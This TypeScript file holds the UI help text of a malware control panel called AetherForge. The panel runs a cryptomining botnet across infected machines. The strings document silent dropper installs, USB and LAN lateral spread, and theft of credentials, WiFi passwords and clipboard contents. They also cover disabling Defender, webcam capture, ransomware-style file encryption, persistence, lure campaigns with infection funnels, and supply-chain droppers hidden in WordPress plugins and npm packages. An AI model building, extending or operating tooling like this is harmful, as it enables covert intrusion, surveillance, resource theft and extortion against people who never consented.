/** Inline help for dashboard, crucible, fleet, build manager, and other operator UI — not forge/calibrate form fields. */ export const UI_HELP: Record = { dash_fleet_health: 'Composite score from online ratio, accept rate, and hashrate activity. Green means the fleet is mining normally; amber or red flags nodes to check on Crucible.', dash_install_funnel: 'Shows how many agents connected in the last 7 days, grouped by forged build. USB column counts agents that arrived via USB spread.', dash_operator_audit: 'Server-side log of operator actions (logins, forge, remote commands). Last 50 entries; refreshes every minute.', dash_signal_locked: 'Live WebSocket link to the control server. When reconnecting, fleet stats may be stale until the signal locks again.', dash_advanced_mode: 'Overview hides extra charts, topology, pool status, and the raw matrix stream. Advanced shows the full telemetry deck.', dash_raw_stream: 'Full-screen scrolling dump of live WebSocket traffic — useful for debugging agent messages, not day-to-day monitoring.', dash_fleet_hash: 'Sum of 15-minute average hashrate across all online Monero (RandomX) miners in the fleet.', dash_est_daily: 'Rough USD/day from live fleet hashrate and the cached XMR price. Connect a wallet on Calibrate for pool-reported earnings instead.', dash_accept_rate: 'Percentage of submitted shares accepted by the pool. Below ~95% often means bad pool connectivity or misconfigured workers.', dash_nodes_live: 'Online agents with an active WebSocket heartbeat versus total registered agents (including offline).', dash_fleet_pipeline: 'Setup checklist: forged build exists → agent deployed → node online → hashrate flowing → shares reaching the pool.', dash_pool_stratum: 'Upstream pool connections from this control server. LIVE = stratum connected; DEGRADED or DOWN means payout risk.', dash_ai_activity: 'Agents with AI Autonomy enabled ask Ollama on this PC for self-healing decisions. Empty until a forged miner reports in.', dash_gpu_rvn: 'Ravencoin KawPoW GPU miners detected on online agents. Separate from Monero CPU hashrate above.', dash_xmr_section: 'Monero RandomX CPU mining stats for the fleet. GPU Ravencoin rigs appear in the RVN section below when active.', crucible_node_roster: 'Every registered agent. Click to select; badges show SSH reachability, security posture, patches, and resource pressure.', crucible_heat_map: 'Spatial view of node selection and group colors. Click a dot to toggle that agent in the roster.', crucible_groups: 'Named color groups for the fleet. Click a group chip to select all members for bulk commands.', crucible_active_target: 'The focused node when exactly one is selected — used for single-agent panels like live desktop and file browser.', crucible_access_depth: 'Host posture, LOTL mining tier status, join lane, and effective onion order for the selected agent — from live WS stats plus mining_diagnostics when run.', crucible_access_depth_calibrate: 'Calibrate → lotl_onion_tiers changes spread contingency order on next agent reconnect (agents forged with lotl_policy_from_server).', crucible_tab_ops: 'Day-to-day remote control: pause/resume mining, shell commands, agent restart, logs, and power actions.', crucible_tab_recon: 'Intelligence gathering: posture scans, full system audit, screenshots, camera list, and network discovery.', crucible_tab_files: 'Browse, upload, download, and encrypt files on the selected online agent via the remote file browser.', crucible_tab_spread: 'Lateral movement and propagation: spread-now, SMB shares, credential vault, and secure wipe.', crucible_tab_tunnels: 'SSH port forwards and protocol tunnels between your control PC and selected agents.', crucible_mining_ops: 'Fleet health power management: pause or resume hashing on selected online nodes. Mining telemetry egresses on the agent WebSocket (same port as heartbeat) — the agent process stays connected.', crucible_resume: 'Fleet health job: restore hashing workload after a pause or idle throttle.', crucible_pause: 'Fleet health job: power down hashing on selected nodes without stopping the agent — they stay connected on WSS.', crucible_full_audit: 'Deep posture scan (30–60s): firewall, WAN IP, geo, DNS, ARP, subnet scan, hardware, and listeners.', crucible_posture_badge: 'Quick security summary from the last heartbeat: AV, firewall, SSH, elevation, and patch state.', crucible_vpc_seeder: 'AWS EC2 agents report vpc-id from IMDS. Fleet Torrent elects one VPC seeder per vpc-id; badge shows VPC seeder (primary) or VPC leecher (secondary seeder in same VPC).', crucible_master_terminal: 'Command output and errors from bulk ops stream here. Green lines succeeded; red lines failed.', crucible_section_agent: 'Restart, fetch logs, kill, or fully uninstall the agent process on selected nodes.', crucible_section_system: 'OS-level power actions — reboot or shutdown the whole machine, not just the miner.', crucible_section_persistence: 'BITS jobs, host-binary hijack, and read-only persistence audits for surviving reboots.', crucible_section_maintenance: 'Fleet upgrades, wake-on-LAN, registry read/write, and remote process kill by PID.', crucible_section_intel: 'One-click intel pulls: screenshot, processes, netstat, clipboard, WiFi creds, and more.', crucible_section_security: 'Post-exploit posture changes — disable Defender or dump saved WiFi passwords.', crucible_section_network: 'Connectivity probes, listener tables, patch status, ARP neighbors, and firewall controls.', crucible_section_media: 'Live desktop polling, camera enumeration, and per-device webcam snapshots.', crucible_section_files_quick: 'Push files to Desktop or a custom path, or pull a remote file into the terminal.', crucible_section_files_advanced: 'Delete, move, or secure-wipe paths on selected agents — confirm before destructive ops.', crucible_section_destructive: 'SYS CRYPT encrypts Documents/home — irreversible without the key.', crucible_section_spread: 'On-demand lateral spread, subnet discovery, SMB shares, credential vault names, and Probe & Join (discover_and_join).', crucible_section_cred_graph: 'Read-only credential affinity edges per /24 subnet — success/fail counts from authorized spread runs (no secrets).', crucible_section_service_graph: 'Enumerated services and join-lane candidates for the selected agent subnet (from discover_and_join / service probe).', crucible_section_seek: 'SUPP Seek recursively seeds media folders with silent launcher stubs (Windows + Mac/Linux).', crucible_section_ssh: 'Probe or wake OpenSSH on Windows nodes, plus a quick reference for direct and tunneled SSH.', crucible_section_tunnels: 'WAN IP, UPnP hole punch, Cloudflare outbound tunnels, mesh peers, and tunnel stop.', crucible_section_protocol_tunnel: 'Full protocol tunnel panel for the focused node — cloudflared, SSH forwards, and live status.', crucible_section_portfwd: 'Matrix of SSH local-forward rules pushed to selected Windows agents.', crucible_section_spread_templates: 'Generate and download custom script templates for lateral movement, registry auto-run persistence, or custom payloads with baked-in server configuration.', bm_pin_dropper: 'Pinned build is served by unauthenticated dropper URLs (install.ps1 / install.sh). Only one build can be pinned at a time.', bm_public_build: 'Public builds appear on the login page download list without signing in — useful for LAN handoffs.', bm_dropper_oneliner: 'One-liner scripts download and silently install the pinned build (or latest if none pinned) from this server.', bm_reforge: 'Open Forge with this build\'s settings pre-filled so you can tweak and compile a new revision.', bm_platform_badge: 'Target OS baked into the installer: Windows, Linux, macOS, or Universal (multi-OS ZIP).', fm_remote_browse: 'Live directory listing on the selected agent. Double-click folders to navigate; select files to download or preview text.', fm_upload: 'Push a file from your browser to the agent. Set destination path or defaults to current folder + filename.', fm_encrypt_path: 'AES-256-GCM encrypt every file at the current path. Irreversible without the key — requires Remote Aggressive Ops.', pt_path_tracer: 'On-demand multi-hop WireGuard VPN through up to 3 Windows agents. Scan the QR or import the .conf on your phone.', pt_agent_chain: 'Pick agents in order — traffic hops through each node. Windows only; max 3 hops. Click TRACE to orchestrate tunnels.', pt_onion_timeline: 'Fork-merge onion timeline for Path Tracer chains — ghost branches per hop, merge winning strains, and skip hospice-retired spread lanes when picking merge parents.', fleet_runtime_policy: 'Push live mining policy (schedule, CPU cap, optional pool override) to online agents without re-forging.', fleet_runtime_modules: 'Hot-load optional agent modules (e.g. crucible ops pack) onto connected workers.', spread_funnel_widget: 'Campaign install funnel: page hits → downloads → first beacon → mining, per ?c= slug. See Emberwake for full war room.', md_overview: 'Fast path to a forged agent: pick Ghost, Loud, or Spread, optionally layer a spread profile, then one click builds and exports a kit when needed. Copy install commands from Builds; track campaigns in Emberwake; use Forge when you need every option.', md_operation_chip: 'Ghost = stealth worker for quiet LAN installs. Loud = visible logs for lab testing. Spread = universal kit with USB/LAN autospread — pair with a spread profile on the right.', md_spread_profile: 'Optional deliverable shape on top of your operation chip — e.g. LAN Kindling adds SMB/SSH spread flags, Desktop Fusion enables media fusion packaging.', md_campaign_identity: 'Campaign slug tags every link with ?c= so Emberwake can group hits and beacons. Worker name, control URL, and wallet are the only identity fields you need here.', md_strike_pipeline: 'One automated run: lock presets → compile the agent → export spread-kit ZIP when the loadout requires it. Install commands live on Builds after the run finishes.', md_equip_strike: 'Starts the pipeline using your equipped loadout. Fix wallet or control URL errors before clicking; grab install one-liners from Builds when done.', md_loadout_preview: 'Live summary of your equipped preset: operation chip, spread profile, campaign slug, worker name, and deliverable shape. Preflight runs before Equip & Strike — fix wallet or endpoint errors shown below the button.', md_campaign_slug: 'Short tag appended as ?c= on install links. Emberwake War Room groups hits, downloads, beacons, and hashrate by this slug — set it before forging so telemetry lands in the right campaign.', md_preflight: 'Wallet, control URL, and worker name must pass validation before Equip & Strike unlocks. Spread Kit export is skipped automatically when your loadout ships a single-platform or fusion deliverable instead.', subnet_immune_autopsy: 'Auto-built when a /24 hits five spread failures: last LOTL attempts, WSUS mimic, persona, erasure fallback, atlas gossip whispers, cause-of-death, and BGP vaccination lane from the spread router.', pt_subnet_autopsy: 'Immune autopsy for spread-target /24 prefixes paused by subnet_spread_pause — shows vaccination route hints beside Path Tracer spread routes.', ew_overview: 'Spread desk after you forge: tag install links with ?c=, export lure kits, and read campaign funnels. Forge agents on Mission Deck (fast) or Forge (full control).', ew_campaign_setup: 'Shared settings for every Emberwake export on this page. Campaign slug tags telemetry; pinned build selects which forged agent gets installed.', ew_campaign_slug: 'Short name appended as ?c= on dropper and download URLs. War Room groups hits, downloads, beacons, and hashrate by this slug.', ew_install_links: 'Per-platform install one-liners live in Builds. Pin a build there, then copy PowerShell / bash / download URLs for remote deploy.', ew_spread_kit: 'Downloads a ZIP of spread-kit templates (README, Deploy scripts, lander assets) with your server URL and campaign slug baked in.', ew_war_room: 'Live funnel per campaign: page hits → downloads → first agent beacon → mining nodes and fleet hashrate. Updates every 15s and on WebSocket push.', ew_supply_chain: 'Advanced: export a WordPress plugin ZIP or npm package template that pulls your dropper on install. Uses campaign settings above.', ew_public_urls: 'Direct /api/v1/public/download links for each build — same files shown on the login page when a build is marked public.', ew_techniques: 'Index of spread vectors with links into the tabbed Spread Techniques playbook. Emberwake handles actions; the playbook has step-by-step how-to.', ew_shared_notes: 'Collaborative scratchpad synced to every logged-in operator. Use for lure copy, host paths, or rotation notes — not stored on agents.', ew_war_room_funnel: 'Shows hits → downloads → first beacon → mining counts per ?c= slug for the selected window. Each column is a funnel stage; a large drop at any step points to where the install chain is breaking.', ew_war_room_views: 'Switch between Funnel board (per-stage campaign breakdown), Stats table (full numbers with sparklines), and Constellations (visual map of campaign activity). All three draw from the same rolling window.', ew_war_room_funnel_board: 'Per-campaign funnel cards: hits → downloads → first beacon → mining → hashrate with stage conversion rates and 7-day hit sparklines. Compare to Command Deck Install Funnel (build-centric) — War Room is campaign-slug centric via ?c=.', ew_war_room_stats_table: 'Tabular War Room view with odometer counts, conversion %, online agents, and daily hit sparklines per campaign slug. Same data as the funnel board — use when you need sortable numbers across many campaigns.', ew_war_room_constellations: 'Force-directed map: node size = hits, brightness = online agents, color = conversion %, edges = shared pin/build. Click a star to highlight its funnel card below.', ew_war_room_leak: 'Automated funnel leak hints when a stage drops sharply (e.g. downloads but no beacons). LEAK = critical drop; Drip = minor — follow the suggested action on each card.', ew_cloud_aws: 'AWS spread kits: S3+CloudFront erasure shards, SSM documents, Launch Templates, Fargate burst, EventBridge fan-out, and Cloud Map snippets. Connection test is HTTP reachability only — operator applies templates in their AWS account.', ew_cloud_generic: 'Vendor-neutral cloud kits: MinIO S3-compatible staging and curl-manifest shard lists. Point bucket/endpoint fields at your operator-owned origin.', ew_crucible_recon_link: 'Cross-link to Crucible with ?reconHost= — opens the spread tab, loads GET /api/v1/recon/deploy-kit, and shows spread-to-unreachable-host when no fleet agent matches the IP.', crucible_recon_host: 'Query param ?reconHost= pre-filters the roster to matching IP/hostname and opens Spread ops. When the host has no online agent, use manual IP target + Spread to host (POST /api/v1/fleet/spread-to-host).', crucible_btn_spread_now: 'Triggers the lateral movement sweep immediately on selected nodes — tries discovered LAN IPs from ARP, SMB, and subnet scan results. Requires Remote Aggressive Ops capability; a prior subnet scan or ARP run gives it more targets.', crucible_btn_subnet_scan: 'Probes the local /24 for live hosts via ICMP and TCP knock and returns a host list. Feeds Spread Now and SSH probe. Can take 10–40 s on congested or slow subnets.', crucible_btn_hole_punch: 'Asks the LAN router to create a UPnP inbound port mapping (default 8989) so the agent is reachable from WAN without a VPN or port-forward rule. Requires a router with UPnP enabled.', crucible_btn_cf_tunnel: 'Launches a cloudflared outbound tunnel to the optional target URL (or the server default tunnel URL). Agent dials out — no inbound firewall rule or open port needed on the target machine.', fl_filter_chips: 'Narrow the roster by name/IP/notes/tags (text search), tag label, subnet prefix, minimum 15m hashrate, or the "needs attention" flag (offline or idle miners below 100 H/s).', fl_bulk_actions: 'Actions applied to every checked agent at once: pause or resume mining, stop the miner thread, restart only idle workers, take a screenshot (one agent only), or permanently delete from roster.', fl_groups: 'Named color-coded subsets of the fleet stored in browser local storage. Click a chip to check-select all members — then apply bulk actions or send Crucible commands to the whole group at once.', set_alerts: 'Dashboard thresholds that trigger amber or red status badges: how long before an agent is marked offline, how far hashrate must drop to flag a node, and at what rejection-rate share quality degrades.', set_alert_notifications: 'Push fleet events to Telegram, a custom webhook endpoint, or email (SMTP). Fill bot token + chat ID or webhook URL, choose which events to forward, save Calibration, then send a test message to confirm delivery.', set_webhook: 'HTTP POST endpoint that receives JSON for every enabled fleet event: { event, title, message }. Use for Slack incoming webhooks, n8n automation, custom dashboards, or any HTTP trigger.', ui_color_scheme: 'AetherForge is steampunk dark-first. When your OS uses light mode, panels soften slightly via prefers-color-scheme — neon brass/cyan tokens stay the same. No separate theme toggle yet.', dr_overview: 'Owned-target browser deploy recon from the control server: TCP port matrix, shallow web crawl for upload/SSRF/CMS hints, and copy-paste curl install.sh + SSRF probe URLs pinned to your session build.', dr_port_matrix: 'Green cells are open TCP ports on the target from this server. Click an open port for the spread lane hint (WinRM, SMB, curl drop, SSH LOTL).', dr_path_prefix: 'Optional URL path prefix for the web crawl seed (e.g. /admin). Port field sets the HTTP(S) service port; HTTPS toggle sets scheme.', dr_fleet_discoveries: 'Merged view of agent subnet recon (WS subnet_discovery_update) and your manual POST /api/v1/recon/scan results. Shows uninfected LAN hosts with open fleet ports — not yet registered as agents.', dr_fleet_subnet_filter: 'Narrow discoveries to one /24 prefix (e.g. 10.0.1.x). Agent reporters tag subnet_prefix from their local interface.', dr_fleet_port_filter: 'Show only hosts with a given TCP port open — e.g. 22 for SSH LOTL, 5985 for WinRM spread candidates.', dr_fleet_sort: 'Order the table by last_seen (newest first by default) or IP. Live WS updates bump last_seen without reordering until you refresh sort.', dr_scan_profile: 'Quick runs the default fleet port matrix and a shallow crawl. Deep adds banners, admin paths, and more pages. SSRF only skips port dial and arms the canary for reflective URL fields.', dr_port_bundle: 'Optional port profile sent as profiles[] on POST /api/v1/recon/scan (web, windows, linux, cloud_metadata). Fleet default uses the server quick matrix.', dr_form_fingerprint: 'High-scoring form fields from the crawl with suggested paste targets (SSRF canary URL or /get probe).', dr_ssrf_canary: 'HTTPS callback URL on your control server (/recon/ping/{scan_id}). Poll status and listen for recon_canary_hit over the operator WebSocket.', dr_upload_admin_map: 'Merged upload-hunter hits and probed admin/login paths with HTTP status and signal tags.', dr_tech_stack: 'Stack hints from port banners and HTML crawl (framework, CMS, server headers).', dr_deploy_kit: 'Suggested join lane for GET /api/v1/recon/deploy-kit on this host after scan (open ports + crawl signals).', dr_banner_grab: 'Service banners and HTTP titles from open web ports during deep scans.', dr_relay_scan: 'POST /api/v1/recon/relay-scan from a fleet seed on the target /24 when the control server cannot reach the host directly.', dr_action_matrix: 'Ranked spread lanes from recommendations and open ports with quick links to playbook and Crucible spread tab.', dr_playbook_wizard: 'Modal tree of recommended lanes for the current target with Crucible deep links.', dr_history: 'Server and local scan history for the target host; click a row to reload that report in the UI.', dr_export_json: 'Download the raw ReconScanReport JSON for ticketing or offline diff.', };